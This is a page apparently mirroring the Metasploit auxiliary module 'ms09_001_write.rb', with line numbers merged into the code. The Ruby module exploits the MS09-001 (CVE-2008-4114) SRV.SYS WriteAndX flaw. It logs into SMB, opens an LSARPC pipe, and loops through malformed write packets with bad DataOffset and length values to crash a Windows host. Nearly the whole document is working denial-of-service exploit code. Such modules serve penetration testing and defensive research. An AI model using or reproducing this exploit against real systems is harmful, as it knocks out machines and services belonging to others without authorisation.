Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/dos/windows/smb/ms09_001_write.rb
Views: 11624
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::SMB::Client7include Msf::Auxiliary::Dos89def initialize(info = {})10super(update_info(info,11'Name' => 'Microsoft SRV.SYS WriteAndX Invalid DataOffset',12'Description' => %q{13This module exploits a denial of service vulnerability in the14SRV.SYS driver of the Windows operating system.1516This module has been tested successfully against Windows Vista.17},1819'Author' => [ 'j.v.vallejo[at]gmail.com' ],20'License' => MSF_LICENSE,21'References' =>22[23['MSB', 'MS09-001'],24['OSVDB', '48153'],25['CVE', '2008-4114'],26['BID', '31179'],27]28)29)3031deregister_options('SMB::ProtocolVersion')32end333435def send_smb_pkt(dlenlow, doffset,fillersize)3637connect(versions: [1])38smb_login()3940pkt = CONST::SMB_CREATE_PKT.make_struct41pkt['Payload']['SMB'].v['Flags1'] = 0x1842pkt['Payload']['SMB'].v['Flags2'] = 0xc8074344pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i45pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i46pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i47pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i4849pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX5051pkt['Payload']['SMB'].v['WordCount'] = 245253pkt['Payload'].v['AndX'] = 25554pkt['Payload'].v['AndXOffset'] = 0xdede55pkt['Payload'].v['FileNameLen'] = 1456pkt['Payload'].v['CreateFlags'] = 0x1657pkt['Payload'].v['AccessMask'] = 0x2019f # Maximum Allowed58pkt['Payload'].v['ShareAccess'] = 759pkt['Payload'].v['CreateOptions'] = 0x40004060pkt['Payload'].v['Impersonation'] = 261pkt['Payload'].v['Disposition'] = 162pkt['Payload'].v['Payload'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00"636465simple.client.smb_send(pkt.to_s)66ack = simple.client.smb_recv_parse(CONST::SMB_COM_NT_CREATE_ANDX)6768pkt = CONST::SMB_WRITE_PKT.make_struct69data_offset = pkt.to_s.length - 470filler = Rex::Text.rand_text(fillersize)7172pkt['Payload']['SMB'].v['Signature1']=0xcccccccc73pkt['Payload']['SMB'].v['Signature2']=0xcccccccc74pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i75pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i76pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i77pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i78pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_WRITE_ANDX79pkt['Payload']['SMB'].v['Flags1'] = 0x1880pkt['Payload']['SMB'].v['Flags2'] = 0xc80781pkt['Payload']['SMB'].v['WordCount'] = 1482pkt['Payload'].v['AndX'] = 25583pkt['Payload'].v['AndXOffset'] = 0xdede84pkt['Payload'].v['FileID'] = ack['Payload'].v['FileID']85pkt['Payload'].v['Offset'] = 086pkt['Payload'].v['Reserved2'] = -187pkt['Payload'].v['WriteMode'] = 888pkt['Payload'].v['Remaining'] = fillersize89pkt['Payload'].v['DataLenHigh'] = 090pkt['Payload'].v['DataLenLow'] = dlenlow #<==================91pkt['Payload'].v['DataOffset'] = doffset #<====92pkt['Payload'].v['DataOffsetHigh'] = 0xcccccccc #<====93pkt['Payload'].v['ByteCount'] = fillersize #<====94pkt['Payload'].v['Payload'] = filler9596simple.client.smb_send(pkt.to_s)97end9899def run100101print_line("Attempting to crash the remote host...")102k=72103j=0xffff104while j>10000105i=0xffff106while i>10000107begin108print_line("datalenlow=#{i} dataoffset=#{j} fillersize=#{k}")109send_smb_pkt(i,j,k)110rescue111print_line("rescue")112end113i=i-10000114end115j=j-10000116end117end118end119120121